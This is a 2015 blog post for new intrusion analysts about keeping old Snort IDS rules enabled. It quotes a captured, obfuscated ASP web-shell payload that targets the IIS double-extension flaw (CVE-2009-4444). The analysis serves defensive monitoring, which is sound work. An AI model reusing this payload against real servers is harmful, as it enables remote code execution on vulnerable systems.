Information, tools and how-to's for the new intrusion analyst. Mentoring by blogging.

Friday, August 28, 2015

Old Rules Can Still Be Useful

An IDS/IPS needs constant, careful tuning, and one of the ways to do this is to filter out old rules or signatures that are no longer relevant. To this day there is still Code Red traffic on the Internet,but enabling the rules for it would just contribute to the background noise of alerts that aren't relevant any longer. Or one would hope!
But sometimes older alerts can be useful in making you aware of malicious traffic targeting your infrastructure that you might otherwise miss.

As an example, Snort/Sourcefire has a rule "named" SERVER-IIS multiple extension code execution attempt (that's actually the Message field, but there is no name field, so close enough). This is an alert for a vulnerability in IIS servers that goes back to 2009 (CVE 2009-4444). The rule was still turned on by default in the policy applied to the sensors I monitor, and it triggered several alerts with a source IP from China. The payload of the packet was as follows:

autoshell=eval("Ex"%26cHr(101)%26"cute(""Server.ScriptTimeout%3D3600:On+Error+Resume+Next:Function+bd%28byVal+s%29%3AFor+i%3D1+To+Len%28s%29+Step+2%3Ac%3DMid%28s%2Ci%2C2%29%3AIf+IsNumeric%28Mid%28s%2Ci%2C1%29%29+Then%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26%22%22%22%22%29%22%22%22%22%29%3AElse%3AExecute%28%22%22%22%22bd%3Dbd%26chr%28%26H%22%22%22%22%26c%26Mid%28s%2Ci%2B2%2C2%29%26%22%22%22%22%29%22%22%22%22%29%3Ai%3Di%2B2%3AEnd+If%22%22%26chr%2810%29%26%22%22Next%3AEnd+Function:Response.Write(""""->|""""):Ex"%26cHr(101)%26"cute(""""On+Error+Resume+Next:""""%26bd(""""526573706F6E73652E5772697465282268616F72656E2229"""")):Response.Write(""""|
The exploit wasn't successful, and the server has been patched for years against the double extension vulnerability (they used .asp;.jpg in the POST command) but it got my attention none the less.
It caused me to be aware of the malicious traffic targeting that domain and to do some investigation to see what other traffic came from the source.

Obviously, you don't want to keep all of your older rules enabled or you'd soon be overwhelmed with alerts, but when you come across one with traffic like this, it might weigh in on your decision whether to disable it or not as being too old or irrelevant. Sometimes, if the traffic warrants it, it might be good to keep a few "canaries in a coal mine" to keep you alerted of malicious intent that might indicate another look.->